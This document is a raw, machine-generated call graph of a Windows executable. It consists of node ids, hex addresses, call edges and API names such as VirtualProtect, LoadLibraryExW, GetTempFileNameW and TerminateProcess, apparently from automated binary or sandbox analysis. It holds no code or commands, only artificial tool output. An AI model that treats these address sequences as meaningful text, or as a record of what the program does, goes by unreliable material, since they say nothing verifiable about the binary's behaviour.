8a3217 103986->103993 103992 8a2c77 __initptd 103992->103862 104010 8a9c0b 103993->104010 103995 8a2c59 103996 8a2c88 RtlDecodePointer RtlDecodePointer 103995->103996 103997 8a2c65 103996->103997 103998 8a2cb5 103996->103998 104007 8a2c82 103997->104007 103998->103997 104056 8a87a4 59 API calls __swprintf 103998->104056 104000 8a2d18 RtlEncodePointer RtlEncodePointer 104000->103997 104001 8a2cc7 104001->104000 104003 8a2cec 104001->104003 104057 8a8864 61 API calls __realloc_crt 104001->104057 104003->103997 104005 8a2d06 RtlEncodePointer 104003->104005 104058 8a8864 61 API calls __realloc_crt 104003->104058 104005->104000 104006 8a2d00 104006->103997 104006->104005 104059 8a3220 104007->104059 104011 8a9c2f RtlEnterCriticalSection 104010->104011 104012 8a9c1c 104010->104012 104011->103995 104017 8a9c93 104012->104017 104014 8a9c22 104014->104011 104041 8a30b5 58 API calls 3 library calls 104014->104041 104018 8a9c9f __initptd 104017->104018 104019 8a9ca8 104018->104019 104020 8a9cc0 104018->104020 104042 8aa16b 58 API calls 2 library calls 104019->104042 104025 8a9ce1 __initptd 104020->104025 104045 8a881d 58 API calls 2 library calls 104020->104045 104023 8a9cad 104043 8aa1c8 58 API calls 8 library calls 104023->104043 104024 8a9cd5 104028 8a9ceb 104024->104028 104029 8a9cdc 104024->104029 104025->104014 104027 8a9cb4 104044 8a309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104027->104044 104032 8a9c0b __lock 58 API calls 104028->104032 104046 8a8b28 58 API calls __getptd_noexit 104029->104046 104034 8a9cf2 104032->104034 104035 8a9cff 104034->104035 104036 8a9d17 104034->104036 104047 8a9e2b InitializeCriticalSectionAndSpinCount 104035->104047 104048 8a2d55 104036->104048 104039 8a9d0b 104054 8a9d33 RtlLeaveCriticalSection _doexit 104039->104054 104042->104023 104043->104027 104045->104024 104046->104025 104047->104039 104049 8a2d87 __dosmaperr 104048->104049 104050 8a2d5e RtlFreeHeap 104048->104050 104049->104039 104050->104049 104051 8a2d73 104050->104051 104055 8a8b28 58 API calls __getptd_noexit 104051->104055 104053 8a2d79 GetLastError 104053->104049 104054->104025 104055->104053 104056->104001 104057->104003 104058->104006 104062 8a9d75 RtlLeaveCriticalSection 104059->104062 104061 8a2c87 104061->103992 104062->104061 104063 88be19 104064 88c36a 104063->104064 104065 88be22 104063->104065 104073 88ba8b Mailbox 104064->104073 104102 8d7bdb 59 API calls _memmove 104064->104102 104065->104064 104078 889837 104065->104078 104069 88be5d 104096 887a51 104069->104096 104070 8c1085 104103 888047 104070->104103 104075 8c1361 104073->104075 104077 88baab 104073->104077 104108 888cd4 59 API calls Mailbox 104073->104108 104075->104077 104107 8a3d46 59 API calls __wtof_l 104075->104107 104079 88984b 104078->104079 104080 889851 104078->104080 104079->104064 104079->104069 104081 8bf5d3 __i64tow 104080->104081 104082 889899 104080->104082 104084 889857 __itow 104080->104084 104087 8bf4da 104080->104087 104109 8a3698 83 API calls 3 library calls 104082->104109 104086 8a0db6 Mailbox 59 API calls 104084->104086 104088 889871 104086->104088 104089 8a0db6 Mailbox 59 API calls 104087->104089 104091 8bf552 Mailbox _wcscpy 104087->104091 104088->104079 104090 887de1 59 API calls 104088->104090 104092 8bf51f 104089->104092 104090->104079 104110 8a3698 83 API calls 3 library calls 104091->104110 104093 8a0db6 Mailbox 59 API calls 104092->104093 104094 8bf545 104093->104094 104094->104091 104095 887de1 59 API calls 104094->104095 104095->104091 104097 887a5f 104096->104097 104101 887a85 _memmove 104096->104101 104098 8a0db6 Mailbox 59 API calls 104097->104098 104097->104101 104099 887ad4 104098->104099 104100 8a0db6 Mailbox 59 API calls 104099->104100 104100->104101 104101->104073 104102->104070 104104 88805a 104103->104104 104105 888052 104103->104105 104104->104073 104111 887f77 59 API calls 2 library calls 104105->104111 104107->104077 104108->104073 104109->104084 104110->104081 104111->104104 104112 8c416f 104116 8d5fe6 104112->104116 104114 8c417a 104115 8d5fe6 85 API calls 104114->104115 104115->104114 104117 8d6020 104116->104117 104122 8d5ff3 104116->104122 104117->104114 104118 8d6022 104137 889328 84 API calls Mailbox 104118->104137 104120 8d6027 104121 889837 84 API calls 104120->104121 104123 8d602e 104121->104123 104122->104117 104122->104118 104122->104120 104125 8d601a 104122->104125 104127 887b2e 104123->104127 104136 8895a0 59 API calls _wcsstr 104125->104136 104128 8bec6b 104127->104128 104129 887b40 104127->104129 104138 8d7bdb 59 API calls _memmove 104128->104138 104130 887a51 59 API calls 104129->104130 104132 887b4c 104130->104132 104132->104117 104133 8bec75 104134 888047 59 API calls 104133->104134 104135 8bec7d Mailbox 104134->104135 104136->104117 104137->104120 104138->104133 104139 8bfdfc 104175 88ab30 Mailbox _memmove 104139->104175 104141 8d617e Mailbox 59 API calls 104163 88a057 104141->104163 104145 88b525 104337 8e9e4a 89 API calls 4 library calls 104145->104337 104146 8a0db6 59 API calls Mailbox 104164 889f37 Mailbox 104146->104164 104147 8c0055 104336 8e9e4a 89 API calls 4 library calls 104147->104336 104149 88b475 104157 888047 59 API calls 104149->104157 104152 888047 59 API calls 104152->104164 104153 8c0064 104154 88b47a 104154->104147 104167 8c09e5 104154->104167 104157->104163 104159 8d6e8f 59 API calls 104159->104164 104160 887667 59 API calls 104160->104164 104161 8a2d40 67 API calls __cinit 104161->104164 104162 887de1 59 API calls 104162->104175 104164->104146 104164->104147 104164->104149 104164->104152 104164->104154 104164->104159 104164->104160 104164->104161 104164->104163 104165 8c09d6 104164->104165 104168 88a55a 104164->104168 104188 88b900 104164->104188 104315 88c8c0 331 API calls 2 library calls 104164->104315 104340 8e9e4a 89 API calls 4 library calls 104165->104340 104341 8e9e4a 89 API calls 4 library calls 104167->104341 104339 8e9e4a 89 API calls 4 library calls 104168->104339 104171 88b2b6 104334 88f6a3 331 API calls 104171->104334 104174 8c086a 104176 889c90 Mailbox 59 API calls 104174->104176 104175->104145 104175->104162 104175->104163 104175->104164 104175->104171 104175->104174 104177 8c0878 104175->104177 104179 8c085c 104175->104179 104180 88b21c 104175->104180 104182 8a0db6 59 API calls Mailbox 104175->104182 104185 8d6e8f 59 API calls 104175->104185 104204 889ea0 104175->104204 104228 8fdf23 104175->104228 104231 8fdf37 104175->104231 104234 8fc2e0 104175->104234 104266 8e7956 104175->104266 104272 8fbc6b 104175->104272 104312 8d617e 104175->104312 104316 889c90 104175->104316 104335 8fc193 85 API calls 2 library calls 104175->104335 104176->104179 104338 8e9e4a 89 API calls 4 library calls 104177->104338 104179->104141 104179->104163 104321 889d3c 104180->104321 104182->104175 104183 88b22d 104184 889d3c 60 API calls 104183->104184 104184->104171 104185->104175 104190 88b91a 104188->104190 104191 88bac7 104188->104191 104189 88baab 104189->104164 104190->104189 104190->104191 104192 88bf81 104190->104192 104194 88b9fc 104190->104194 104191->104189 104191->104192 104195 88bb46 104191->104195 104202 88ba8b Mailbox 104191->104202 104192->104189 104346 8894dc 59 API calls wcstoxq 104192->104346 104194->104189 104194->104195 104199 88ba38 104194->104199 104195->104189 104197 8c1361 104195->104197 104195->104202 104343 8d6e8f 59 API calls 104195->104343 104197->104189 104344 8a3d46 59 API calls __wtof_l 104197->104344 104199->104189 104201 8c11b4 104199->104201 104199->104202 104201->104189 104342 8a3d46 59 API calls __wtof_l 104201->104342 104202->104164 104202->104189 104202->104197 104345 888cd4 59 API calls Mailbox 104202->104345 104205 889ebf 104204->104205 104223 889eed Mailbox 104204->104223 104206 8a0db6 Mailbox 59 API calls 104205->104206 104206->104223 104207 8a2d40 67 API calls __cinit 104207->104223 104208 88b475 104209 888047 59 API calls 104208->104209 104217 88a057 104209->104217 104210 8d6e8f 59 API calls 104210->104223 104211 88b47a 104212 8c0055 104211->104212 104227 8c09e5 104211->104227 104348 8e9e4a 89 API calls 4 library calls 104212->104348 104213 88b900 60 API calls 104213->104223 104216 8a0db6 59 API calls Mailbox 104216->104223 104217->104175 104218 8c0064 104218->104175 104220 887667 59 API calls 104220->104223 104222 888047 59 API calls 104222->104223 104223->104207 104223->104208 104223->104210 104223->104211 104223->104212 104223->104213 104223->104216 104223->104217 104223->104220 104223->104222 104224 8c09d6 104223->104224 104226 88a55a 104223->104226 104347 88c8c0 331 API calls 2 library calls 104223->104347 104350 8e9e4a 89 API calls 4 library calls 104224->104350 104349 8e9e4a 89 API calls 4 library calls 104226->104349 104351 8e9e4a 89 API calls 4 library calls 104227->104351 104352 8fcadd 104228->104352 104230 8fdf33 104230->104175 104232 8fcadd 130 API calls 104231->104232 104233 8fdf47 104232->104233 104233->104175 104235 887667 59 API calls 104234->104235 104236 8fc2f4 104235->104236 104237 887667 59 API calls 104236->104237 104238 8fc2fc 104237->104238 104239 887667 59 API calls 104238->104239 104240 8fc304 104239->104240 104241 889837 84 API calls 104240->104241 104254 8fc312 104241->104254 104242 887bcc 59 API calls 104242->104254 104243 8fc528 Mailbox 104243->104175 104244 8fc4e2 104246 887cab 59 API calls 104244->104246 104248 8fc4ef 104246->104248 104247 8fc4fd 104250 887cab 59 API calls 104247->104250 104252 887b2e 59 API calls 104248->104252 104249 887924 59 API calls 104249->104254 104253 8fc50c 104250->104253 104251 888047 59 API calls 104251->104254 104256 8fc4fb 104252->104256 104257 887b2e 59 API calls 104253->104257 104254->104242 104254->104243 104254->104244 104254->104247 104254->104249 104254->104251 104255 887e4f 59 API calls 104254->104255 104254->104256 104258 887e4f 59 API calls 104254->104258 104263 889837 84 API calls 104254->104263 104264 887cab 59 API calls 104254->104264 104265 887b2e 59 API calls 104254->104265 104259 8fc3a9 CharUpperBuffW 104255->104259 104256->104243 104477 889a3c 59 API calls Mailbox 104256->104477 104257->104256 104260 8fc469 CharUpperBuffW 104258->104260 104475 88843a 68 API calls 104259->104475 104476 88c5a7 69 API calls 2 library calls 104260->104476 104263->104254 104264->104254 104265->104254 104267 8e7962 104266->104267 104268 8a0db6 Mailbox 59 API calls 104267->104268 104269 8e7970 104268->104269 104270 887667 59 API calls 104269->104270 104271 8e797e 104269->104271 104270->104271 104271->104175 104273 8fbc96 104272->104273 104274 8fbcb0 104272->104274 104478 8e9e4a 89 API calls 4 library calls 104273->104478 104479 8fa213 59 API calls Mailbox 104274->104479 104277 8fbcbb 104278 889ea0 330 API calls 104277->104278 104279 8fbd1c 104278->104279 104280 8fbca8 Mailbox 104279->104280 104281 8fbdae 104279->104281 104284 8fbd5d 104279->104284 104280->104175 104282 8fbe04 104281->104282 104283 8fbdb4 104281->104283 104282->104280 104285 889837 84 API calls 104282->104285 104499 8e791a 59 API calls 104283->104499 104480 8e72df 59 API calls Mailbox 104284->104480 104287 8fbe16 104285->104287 104290 887e4f 59 API calls 104287->104290 104288 8fbdd7 104500 885d41 59 API calls Mailbox 104288->104500 104293 8fbe3a CharUpperBuffW 104290->104293 104292 8fbd8d 104481 88f460 104292->104481 104295 8fbe54 104293->104295 104297 8fbe5b 104295->104297 104298 8fbea7 104295->104298 104296 8fbddf Mailbox 104501 88fce0 104296->104501 104581 8e72df 59 API calls Mailbox 104297->104581 104300 889837 84 API calls 104298->104300 104301 8fbeaf 104300->104301 104582 889e5d 60 API calls 104301->104582 104304 8fbe89 104305 88f460 330 API calls 104304->104305 104305->104280 104306 8fbeb9 104306->104280 104307 889837 84 API calls 104306->104307 104308 8fbed4 104307->104308 104583 885d41 59 API calls Mailbox 104308->104583 104310 8fbee4 104311 88fce0 330 API calls 104310->104311 104311->104280 105953 8d60c0 104312->105953 104314 8d618c 104314->104175 104315->104164 104318 889c9b 104316->104318 104317 889cd2 104317->104175 104318->104317 105958 888cd4 59 API calls Mailbox 104318->105958 104320 889cfd 104320->104175 104322 889d4a 104321->104322 104327 889d78 Mailbox 104321->104327 104323 889d9d 104322->104323 104328 889d50 Mailbox 104322->104328 104324 888047 59 API calls 104323->104324 104324->104327 104325 8bfa0f 104325->104327 105960 8d6e8f 59 API calls 104325->105960 104326 889d64 104326->104327 104329 889dcc 104326->104329 104330 889d6f 104326->104330 104327->104183 104328->104325 104328->104326 104329->104327 105959 888cd4 59 API calls Mailbox 104329->105959 104330->104327 104332 8bf9e6 VariantClear 104330->104332 104332->104327 104334->104145 104335->104175 104336->104153 104337->104179 104338->104179 104339->104163 104340->104167 104341->104163 104342->104201 104343->104202 104344->104189 104345->104202 104346->104189 104347->104223 104348->104218 104349->104217 104350->104227 104351->104217 104353 889837 84 API calls 104352->104353 104354 8fcb1a 104353->104354 104373 8fcb61 Mailbox 104354->104373 104390 8fd7a5 104354->104390 104356 8fcdb9 104357 8fcf2e 104356->104357 104361 8fcdc7 104356->104361 104439 8fd8c8 92 API calls Mailbox 104357->104439 104360 8fcf3d 104360->104361 104363 8fcf49 104360->104363 104403 8fc96e 104361->104403 104362 889837 84 API calls 104381 8fcbb2 Mailbox 104362->104381 104363->104373 104368 8fce00 104418 8a0c08 104368->104418 104371 8fce1a 104424 8e9e4a 89 API calls 4 library calls 104371->104424 104372 8fce33 104425 8892ce 104372->104425 104373->104230 104376 8fce25 GetCurrentProcess TerminateProcess 104376->104372 104381->104356 104381->104362 104381->104373 104422 8ffbce 59 API calls 2 library calls 104381->104422 104423 8fcfdf 61 API calls 2 library calls 104381->104423 104382 8fcfa4 104382->104373 104386 8fcfb8 FreeLibrary 104382->104386 104383 8fce6b 104437 8fd649 107 API calls _free 104383->104437 104386->104373 104388 8fce7c 104388->104382 104389 889d3c 60 API calls 104388->104389 104438 888d40 59 API calls Mailbox 104388->104438 104440 8fd649 107 API calls _free 104388->104440 104389->104388 104391 887e4f 59 API calls 104390->104391 104392 8fd7c0 CharLowerBuffW 104391->104392 104441 8df167 104392->104441 104396 887667 59 API calls 104397 8fd7f9 104396->104397 104448 88784b 104397->104448 104399 8fd810 104400 887d2c 59 API calls 104399->104400 104401 8fd81c Mailbox 104400->104401 104402 8fd858 Mailbox 104401->104402 104461 8fcfdf 61 API calls 2 library calls 104401->104461 104402->104381 104404 8fc989 104403->104404 104408 8fc9de 104403->104408 104405 8a0db6 Mailbox 59 API calls 104404->104405 104407 8fc9ab 104405->104407 104406 8a0db6 Mailbox 59 API calls 104406->104407 104407->104406 104407->104408 104409 8fda50 104408->104409 104410 8fdc79 Mailbox 104409->104410 104417 8fda73 _strcat _wcscpy __wsetenvp 104409->104417 104410->104368 104411 889b98 59 API calls 104411->104417 104412 889b3c 59 API calls 104412->104417 104413 889be6 59 API calls 104413->104417 104414 889837 84 API calls 104414->104417 104415 8a571c 58 API calls __malloc_crt 104415->104417 104417->104410 104417->104411 104417->104412 104417->104413 104417->104414 104417->104415 104465 8e5887 61 API calls 2 library calls 104417->104465 104419 8a0c1d 104418->104419 104420 8a0cb5 VirtualProtect 104419->104420 104421 8a0c83 104419->104421 104420->104421 104421->104371 104421->104372 104422->104381 104423->104381 104424->104376 104426 8892d6 104425->104426 104427 8a0db6 Mailbox 59 API calls 104426->104427 104428 8892e4 104427->104428 104429 8892f0 104428->104429 104466 8891fc 59 API calls Mailbox 104428->104466 104431 889050 104429->104431 104467 889160 104431->104467 104433 8a0db6 Mailbox 59 API calls 104435 8890fb 104433->104435 104434 88905f 104434->104433 104434->104435 104435->104388 104436 888d40 59 API calls Mailbox 104435->104436 104436->104383 104437->104388 104438->104388 104439->104360 104440->104388 104442 8df192 __wsetenvp 104441->104442 104443 8df1d1 104442->104443 104446 8df1c7 104442->104446 104447 8df278 104442->104447 104443->104396 104443->104401 104446->104443 104462 8878c4 61 API calls 104446->104462 104447->104443 104463 8878c4 61 API calls 104447->104463 104449 88785a 104448->104449 104450 8878b7 104448->104450 104449->104450 104451 887865 104449->104451 104452 887d2c 59 API calls 104450->104452 104453 8beb09 104451->104453 104454 887880 104451->104454 104458 887888 _memmove 104452->104458 104455 888029 59 API calls 104453->104455 104464 887f27 59 API calls Mailbox 104454->104464 104457 8beb13 104455->104457 104459 8a0db6 Mailbox 59 API calls 104457->104459 104458->104399 104460 8beb33 104459->104460 104461->104402 104462->104446 104463->104447 104464->104458 104465->104417 104466->104429 104468 889169 Mailbox 104467->104468 104469 8bf19f 104468->104469 104474 889173 104468->104474 104470 8a0db6 Mailbox 59 API calls 104469->104470 104472 8bf1ab 104470->104472 104471 88917a 104471->104434 104473 889c90 Mailbox 59 API calls 104473->104474 104474->104471 104474->104473 104475->104254 104476->104254 104477->104243 104478->104280 104479->104277 104480->104292 104482 88f4ba 104481->104482 104483 88f650 104481->104483 104484 8c441e 104482->104484 104485 88f4c6 104482->104485 104486 887de1 59 API calls 104483->104486 104487 8fbc6b 331 API calls 104484->104487 104676 88f290 331 API calls 2 library calls 104485->104676 104491 88f58c Mailbox 104486->104491 104489 8c442c 104487->104489 104493 88f630 104489->104493 104677 8e9e4a 89 API calls 4 library calls 104489->104677 104584 8f445a 104491->104584 104593 8ecb7a 104491->104593 104673 8e3c37 104491->104673 104492 88f4fd 104492->104489 104492->104491 104492->104493 104493->104280 104494 889c90 Mailbox 59 API calls 104495 88f5e3 104494->104495 104495->104493 104495->104494 104499->104288 104500->104296 105753 888180 104501->105753 104503 88fd3d 104504 8c472d 104503->104504 104563 8906f6 104503->104563 105758 88f234 104503->105758 105860 8e9e4a 89 API calls 4 library calls 104504->105860 104508 88fe3e 104509 8c488d 104508->104509 104513 88fe4c 104508->104513 105864 8d66ec 59 API calls 2 library calls 104508->105864 104509->104513 104515 8c4742 104509->104515 105866 8fa2d9 85 API calls Mailbox 104509->105866 104510 890517 104519 8a0db6 Mailbox 59 API calls 104510->104519 104512 8c47d7 104512->104515 105862 8e9e4a 89 API calls 4 library calls 104512->105862 104520 8c48f9 104513->104520 104568 8c4b53 104513->104568 105762 88837c 104513->105762 104516 8c4848 105865 8d60ef 59 API calls 2 library calls 104516->105865 104527 890545 _memmove 104519->104527 104528 8c4917 104520->104528 105868 8885c0 104520->105868 104523 8c4755 104523->104512 105861 88f6a3 331 API calls 104523->105861 104525 8c48b2 Mailbox 104525->104513 105867 8d66ec 59 API calls 2 library calls 104525->105867 104535 8a0db6 Mailbox 59 API calls 104527->104535 104532 8c4928 104528->104532 104537 8885c0 59 API calls 104528->104537 104529 88fea4 104538 8c4ad6 104529->104538 104539 88ff32 104529->104539 104573 890179 Mailbox _memmove 104529->104573 104530 8c486b 104533 889ea0 331 API calls 104530->104533 104532->104573 105876 8d60ab 59 API calls Mailbox 104532->105876 104533->104509 104534 8a0db6 59 API calls Mailbox 104555 88fdd3 104534->104555 104579 890106 _memmove 104535->104579 104537->104532 105884 8e9ae7 60 API calls 104538->105884 104540 8a0db6 Mailbox 59 API calls 104539->104540 104544 88ff39 104540->104544 104543 889ea0 331 API calls 104543->104555 104544->104563 105769 8909d0 104544->105769 104545 8c4a4d 104546 889ea0 331 API calls 104545->104546 104547 8c4a87 104546->104547 104547->104515 105879 8884c0 104547->105879 104549 88ffb2 104549->104527 104558 88ffe6 104549->104558 104549->104563 104554 8c480c 105863 8e9e4a 89 API calls 4 library calls 104554->105863 104555->104508 104555->104510 104555->104515 104555->104523 104555->104527 104555->104534 104555->104543 104555->104554 104557 8c4ab2 105883 8e9e4a 89 API calls 4 library calls 104557->105883 104562 888047 59 API calls 104558->104562 104565 890007 104558->104565 104560 889c90 Mailbox 59 API calls 104560->104579 104561 889d3c 60 API calls 104561->104573 104562->104565 105859 8e9e4a 89 API calls 4 library calls 104563->105859 104564 890398 104564->104280 104565->104563 104566 8c4b24 104565->104566 104570 89004c 104565->104570 104569 889d3c 60 API calls 104566->104569 104567 8a0db6 59 API calls Mailbox 104567->104573 104568->104515 105885 8e9e4a 89 API calls 4 library calls 104568->105885 104569->104568 104570->104563 104570->104568 104571 8900d8 104570->104571 104572 889d3c 60 API calls 104571->104572 104575 8900eb 104572->104575 104573->104545 104573->104557 104573->104561 104573->104563 104573->104564 104573->104567 104574 8c4a1c 104573->104574 105857 888740 68 API calls __cinit 104573->105857 105858 888660 68 API calls 104573->105858 105877 8e5937 68 API calls 104573->105877 105878 8889b3 69 API calls Mailbox 104573->105878 104577 8a0db6 Mailbox 59 API calls 104574->104577 104575->104563 105846 8882df 104575->105846 104577->104545 104579->104560 104579->104573 104580 890162 104579->104580 104580->104280 104581->104304 104582->104306 104583->104310 104585 889837 84 API calls 104584->104585 104586 8f4494 104585->104586 104678 886240 104586->104678 104588 8f44a4 104589 8f44c9 104588->104589 104590 889ea0 331 API calls 104588->104590 104592 8f44cd 104589->104592 104703 889a98 59 API calls Mailbox 104589->104703 104590->104589 104592->104495 104594 887667 59 API calls 104593->104594 104595 8ecbaf 104594->104595 104596 887667 59 API calls 104595->104596 104597 8ecbb8 104596->104597 104599 8ecbcc 104597->104599 104904 889b3c 59 API calls 104597->104904 104600 889837 84 API calls 104599->104600 104601 8ecbe9 104600->104601 104602 8eccea 104601->104602 104603 8ecc0b 104601->104603 104672 8ecd1a Mailbox 104601->104672 104717 884ddd 104602->104717 104604 889837 84 API calls 104603->104604 104606 8ecc17 104604->104606 104608 888047 59 API calls 104606->104608 104611 8ecc23 104608->104611 104609 8ecd16 104610 887667 59 API calls 104609->104610 104609->104672 104613 8ecd4b 104610->104613 104616 8ecc69 104611->104616 104617 8ecc37 104611->104617 104612 884ddd 136 API calls 104612->104609 104614 887667 59 API calls 104613->104614 104615 8ecd54 104614->104615 104619 887667 59 API calls 104615->104619 104618 889837 84 API calls 104616->104618 104620 888047 59 API calls 104617->104620 104621 8ecc76 104618->104621 104622 8ecd5d 104619->104622 104623 8ecc47 104620->104623 104624 888047 59 API calls 104621->104624 104625 887667 59 API calls 104622->104625 104626 887cab 59 API calls 104623->104626 104627 8ecc82 104624->104627 104628 8ecd66 104625->104628 104629 8ecc51 104626->104629 104905 8e4a31 GetFileAttributesW 104627->104905 104631 889837 84 API calls 104628->104631 104632 889837 84 API calls 104629->104632 104635 8ecd73 104631->104635 104633 8ecc5d 104632->104633 104636 887b2e 59 API calls 104633->104636 104634 8ecc8b 104637 8ecc9e 104634->104637 104640 8879f2 59 API calls 104634->104640 104741 88459b 104635->104741 104636->104616 104639 889837 84 API calls 104637->104639 104646 8ecca4 104637->104646 104642 8ecccb 104639->104642 104640->104637 104641 8ecd8e 104792 8879f2 104641->104792 104906 8e37ef 75 API calls Mailbox 104642->104906 104646->104672 104647 8ecdd1 104649 888047 59 API calls 104647->104649 104648 8879f2 59 API calls 104650 8ecdae 104648->104650 104651 8ecddf 104649->104651 104650->104647 104653 887bcc 59 API calls 104650->104653 104652 887b2e 59 API calls 104651->104652 104654 8ecded 104652->104654 104655 8ecdc3 104653->104655 104656 887b2e 59 API calls 104654->104656 104657 887bcc 59 API calls 104655->104657 104658 8ecdfb 104656->104658 104657->104647 104659 887b2e 59 API calls 104658->104659 104660 8ece09 104659->104660 104661 889837 84 API calls 104660->104661 104662 8ece15 104661->104662 104795 8e4071 104662->104795 104664 8ece26 104665 8e3c37 3 API calls 104664->104665 104666 8ece30 104665->104666 104667 889837 84 API calls 104666->104667 104671 8ece61 104666->104671 104668 8ece4e 104667->104668 104849 8e9155 104668->104849 104907 884e4a 104671->104907 104672->104495 105749 8e445a GetFileAttributesW 104673->105749 104676->104492 104677->104493 104704 887a16 104678->104704 104680 88646a 104711 88750f 59 API calls 2 library calls 104680->104711 104682 886484 Mailbox 104682->104588 104685 8bdff6 104714 8df8aa 91 API calls 4 library calls 104685->104714 104686 88750f 59 API calls 104699 886265 104686->104699 104688 886799 _memmove 104716 8df8aa 91 API calls 4 library calls 104688->104716 104691 8be004 104715 88750f 59 API calls 2 library calls 104691->104715 104692 887d8c 59 API calls 104692->104699 104694 8be01a 104694->104682 104695 8bdf92 104696 888029 59 API calls 104695->104696 104698 8bdf9d 104696->104698 104702 8a0db6 Mailbox 59 API calls 104698->104702 104699->104680 104699->104685 104699->104686 104699->104688 104699->104692 104699->104695 104700 887e4f 59 API calls 104699->104700 104709 885f6c 60 API calls 104699->104709 104710 885d41 59 API calls Mailbox 104699->104710 104712 885e72 60 API calls 104699->104712 104713 887924 59 API calls 2 library calls 104699->104713 104701 88643b CharUpperBuffW 104700->104701 104701->104699 104702->104688 104703->104592 104705 8a0db6 Mailbox 59 API calls 104704->104705 104706 887a3b 104705->104706 104707 888029 59 API calls 104706->104707 104708 887a4a 104707->104708 104708->104699 104709->104699 104710->104699 104711->104682 104712->104699 104713->104699 104714->104691 104715->104694 104716->104682 104913 884bb5 104717->104913 104722 884e08 LoadLibraryExW 104923 884b6a 104722->104923 104723 8bd8e6 104725 884e4a 84 API calls 104723->104725 104727 8bd8ed 104725->104727 104729 884b6a 3 API calls 104727->104729 104731 8bd8f5 104729->104731 104730 884e2f 104730->104731 104732 884e3b 104730->104732 104949 884f0b 104731->104949 104734 884e4a 84 API calls 104732->104734 104736 884e40 104734->104736 104736->104609 104736->104612 104738 8bd91c 104957 884ec7 104738->104957 104742 887667 59 API calls 104741->104742 104743 8845b1 104742->104743 104744 887667 59 API calls 104743->104744 104745 8845b9 104744->104745 104746 887667 59 API calls 104745->104746 104747 8845c1 104746->104747 104748 887667 59 API calls 104747->104748 104749 8845c9 104748->104749 104750 8845fd 104749->104750 104751 8bd4d2 104749->104751 104752 88784b 59 API calls 104750->104752 104753 888047 59 API calls 104751->104753 104754 88460b 104752->104754 104755 8bd4db 104753->104755 104756 887d2c 59 API calls 104754->104756 104757 887d8c 59 API calls 104755->104757 104758 884615 104756->104758 104759 884640 104757->104759 104758->104759 104760 88784b 59 API calls 104758->104760 104761 884680 104759->104761 104763 88465f 104759->104763 104774 8bd4fb 104759->104774 104762 884636 104760->104762 104764 88784b 59 API calls 104761->104764 104765 887d2c 59 API calls 104762->104765 104767 8879f2 59 API calls 104763->104767 104768 884691 104764->104768 104765->104759 104766 8bd5cb 104770 887bcc 59 API calls 104766->104770 104771 884669 104767->104771 104769 8846a3 104768->104769 104772 888047 59 API calls 104768->104772 104773 8846b3 104769->104773 104775 888047 59 API calls 104769->104775 104787 8bd588 104770->104787 104771->104761 104778 88784b 59 API calls 104771->104778 104772->104769 104777 8846ba 104773->104777 104779 888047 59 API calls 104773->104779 104774->104766 104776 8bd5b4 104774->104776 104786 8bd532 104774->104786 104775->104773 104776->104766 104782 8bd59f 104776->104782 104780 888047 59 API calls 104777->104780 104789 8846c1 Mailbox 104777->104789 104778->104761 104779->104777 104780->104789 104781 8879f2 59 API calls 104781->104787 104785 887bcc 59 API calls 104782->104785 104783 8bd590 104784 887bcc 59 API calls 104783->104784 104784->104787 104785->104787 104786->104783 104790 8bd57b 104786->104790 104787->104761 104787->104781 105383 887924 59 API calls 2 library calls 104787->105383 104789->104641 104791 887bcc 59 API calls 104790->104791 104791->104787 104793 887e4f 59 API calls 104792->104793 104794 8879fd 104793->104794 104794->104647 104794->104648 104796 8e408d 104795->104796 104797 8e4092 104796->104797 104798 8e40a0 104796->104798 104800 888047 59 API calls 104797->104800 104799 887667 59 API calls 104798->104799 104801 8e40a8 104799->104801 104848 8e409b Mailbox 104800->104848 104802 887667 59 API calls 104801->104802 104803 8e40b0 104802->104803 104804 887667 59 API calls 104803->104804 104805 8e40bb 104804->104805 104806 887667 59 API calls 104805->104806 104807 8e40c3 104806->104807 104808 887667 59 API calls 104807->104808 104809 8e40cb 104808->104809 104810 887667 59 API calls 104809->104810 104811 8e40d3 104810->104811 104812 887667 59 API calls 104811->104812 104813 8e40db 104812->104813 104814 887667 59 API calls 104813->104814 104815 8e40e3 104814->104815 104816 88459b 59 API calls 104815->104816 104817 8e40fa 104816->104817 104818 88459b 59 API calls 104817->104818 104819 8e4113 104818->104819 104820 8879f2 59 API calls 104819->104820 104821 8e411f 104820->104821 104822 8e4132 104821->104822 104823 887d2c 59 API calls 104821->104823 104824 8879f2 59 API calls 104822->104824 104823->104822 104825 8e413b 104824->104825 104826 8e414b 104825->104826 104827 887d2c 59 API calls 104825->104827 104828 888047 59 API calls 104826->104828 104827->104826 104829 8e4157 104828->104829 104830 887b2e 59 API calls 104829->104830 104831 8e4163 104830->104831 105384 8e4223 59 API calls 104831->105384 104833 8e4172 105385 8e4223 59 API calls 104833->105385 104835 8e4185 104836 8879f2 59 API calls 104835->104836 104837 8e418f 104836->104837 104838 8e41a6 104837->104838 104839 8e4194 104837->104839 104841 8879f2 59 API calls 104838->104841 104840 887cab 59 API calls 104839->104840 104848->104664 104850 8e9162 __ftell_nolock 104849->104850 104851 8a0db6 Mailbox 59 API calls 104850->104851 104852 8e91bf 104851->104852 104853 88522e 59 API calls 104852->104853 104854 8e91c9 104853->104854 104855 8e8f5f GetSystemTimeAsFileTime 104854->104855 104856 8e91d4 104855->104856 104857 884ee5 85 API calls 104856->104857 104858 8e91e7 _wcscmp 104857->104858 104859 8e920b 104858->104859 104860 8e92b8 104858->104860 105416 8e9734 104859->105416 104862 8e9734 96 API calls 104860->104862 104877 8e9284 _wcscat 104862->104877 104865 884f0b 74 API calls 104866 8e92dd 104865->104866 104868 884f0b 74 API calls 104866->104868 104867 8e92c1 104867->104671 104870 8e92ed 104868->104870 104869 8e9239 _wcscat _wcscpy 105423 8a40fb 58 API calls __wsplitpath_helper 104869->105423 104871 884f0b 74 API calls 104870->104871 104873 8e9308 104871->104873 104874 884f0b 74 API calls 104873->104874 104875 8e9318 104874->104875 104876 884f0b 74 API calls 104875->104876 104878 8e9333 104876->104878 104877->104865 104877->104867 104879 884f0b 74 API calls 104878->104879 104880 8e9343 104879->104880 104881 884f0b 74 API calls 104880->104881 104882 8e9353 104881->104882 104883 884f0b 74 API calls 104882->104883 104884 8e9363 104883->104884 105386 8e98e3 GetTempPathW GetTempFileNameW 104884->105386 104904->104599 104905->104634 104906->104646 104908 884e5b 104907->104908 104909 884e54 104907->104909 104911 884e6a 104908->104911 104912 884e7b FreeLibrary 104908->104912 104910 8a53a6 __fcloseall 83 API calls 104909->104910 104910->104908 104911->104672 104912->104911 104962 884c03 104913->104962 